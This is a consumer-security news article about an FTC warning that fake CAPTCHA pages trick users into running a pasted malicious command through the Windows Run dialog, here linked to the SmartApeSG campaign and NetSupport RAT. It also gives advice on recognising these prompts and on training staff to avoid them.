The Federal Trade Commission is warning consumers that fake CAPTCHA prompts are tricking people into installing malware on their own computers. Instead of verifying a human user, the bogus “prove you’re human” boxes instruct visitors to press specific key combinations that paste and execute hidden malicious code. The stolen data includes email logins and mobile banking credentials, turning a routine web interaction into a direct path to identity theft.
How fake CAPTCHAs hijack keyboard shortcuts to install malware
The FTC says it is receiving reports of scam pages that mimic familiar CAPTCHA verification boxes but add a dangerous twist. After clicking a checkbox or completing a visual puzzle, users see instructions telling them to press Windows+R, then Ctrl+V, then Enter. That three-step sequence opens the Windows Run dialog, pastes a pre-loaded malicious command from the clipboard, and executes it, all without the user realizing what just happened. The FTC alert published in June 2026 spells out this exact workflow and confirms that the resulting malware steals credentials including email logins and mobile banking access.
No legitimate CAPTCHA system asks users to open system-level dialogs or paste text into a command prompt. Real verification steps involve clicking images, dragging sliders, or simply checking a box. The distinction matters because the fake version relies entirely on user compliance rather than any software exploit. If someone refuses to follow the keyboard instructions, the attack fails. That makes awareness the primary defense.
SmartApeSG and the ClickFix technique behind the scam
Security researchers at the SANS Internet Storm Center have independently documented the same attack pattern in a campaign they track as SmartApeSG. Their technical write-up confirmed that the campaign uses a ClickFix-style fake CAPTCHA page requiring victims to press Win+R and paste a command. The final payload delivered through this chain is NetSupport RAT, a remote access tool that gives attackers persistent control over the infected machine.
The ClickFix method is significant because it sidesteps traditional defenses. Antivirus software and browser security filters are designed to catch malicious downloads and exploit code. When the user manually types or pastes a command, those protections often do not trigger. The attack essentially recruits the victim as an unwitting accomplice, using their own trusted access to the operating system. This is what separates ClickFix-style social engineering from conventional malware distribution: it does not need a software vulnerability because it exploits a behavioral one.
The FTC frames the threat within a broader pattern of spyware and malware schemes that gain device access through seemingly helpful prompts. Tech-support scams have long used similar psychology, convincing users to grant remote access or run diagnostic tools that actually install surveillance software. Fake CAPTCHAs represent a newer, faster version of the same playbook, condensed into a few keystrokes on a single web page.
What the FTC has not disclosed about scale and specific threats
The FTC alert confirms the agency is receiving reports but does not publish victim counts, infection rates, or the names of specific financial institutions or email providers targeted by the malware. That omission leaves open questions about how widespread the campaign is and whether particular industries or regions are being hit hardest. The SANS analysis ties the SmartApeSG activity to NetSupport RAT, but the FTC keeps its language broader, describing credential theft and potential account takeover without attributing the attacks to a named tool or group.
This gap is typical of early-stage consumer warnings, which prioritize practical advice over detailed threat intelligence. For consumers, the exact malware family matters less than the behavior that installs it. Still, the absence of numbers makes it hard to gauge whether this is a niche tactic or a rapidly growing trend. Until law enforcement or industry groups release more granular data, the best assumption is that any unexpected CAPTCHA-like prompt demanding system-level keyboard shortcuts should be treated as hostile.
How to spot and avoid CAPTCHA scams
Spotting these scams starts with recognizing what a normal verification step looks like. Standard CAPTCHAs stay inside the browser window and never ask you to open the Windows Run box, a terminal, or any other operating-system feature. If a page tells you to press Windows+R, type commands, or paste anything outside the browser, stop immediately and close the tab.
Users should also be wary of CAPTCHAs that appear on top of unfamiliar pages reached through pop-ups, redirects, or pirated content sites. Many malicious pages are triggered by clicking fake download buttons or deceptive video play icons. When in doubt, navigate directly to the site you intended to visit by typing its address or using a bookmark rather than following random links.
Keeping devices updated and running reputable security software can help limit damage if a mistake happens, but no tool can fully protect against commands you voluntarily run. That is why the FTC emphasizes behavioral defenses: slow down when a site asks you to do something unusual, and remember that real security checks never hinge on obscure keyboard shortcuts.
Guidance for businesses and support teams
Organizations should brief employees about these scams, especially staff who regularly browse unfamiliar sites for research or sourcing. Security teams can incorporate fake CAPTCHA scenarios into phishing simulations and awareness training, highlighting that keyboard-based instructions are a red flag. Web administrators may also want to monitor outbound traffic for signs of remote access tools like NetSupport RAT, which can indicate a successful infection.
Help desks and IT support staff should be prepared for callers who encounter suspicious prompts. The FTC’s guidance on tech support fraud underscores the importance of clear policies: legitimate support will never ask users to run unverified commands from random websites. Reinforcing that message can prevent both fake CAPTCHA attacks and more traditional remote-access scams.
Ultimately, the fake CAPTCHA trend shows how attackers continue to refine social engineering, shifting from obvious scare tactics to seemingly routine web interactions. By learning to question any online instruction that reaches beyond the browser, users and businesses can blunt this latest malware delivery channel before it becomes embedded in everyday attack kits.
David M. Keller is a finance writer based in Columbus, Ohio, covering personal finance and consumer-focused economic topics. He earned his degree in journalism from Ohio University and began his career reporting on local business and economic trends for a regional media outlet. Since then, he has contributed to a variety of online publications, focusing on clear, practical coverage of topics such as cost of living, debt, and everyday financial decision-making.
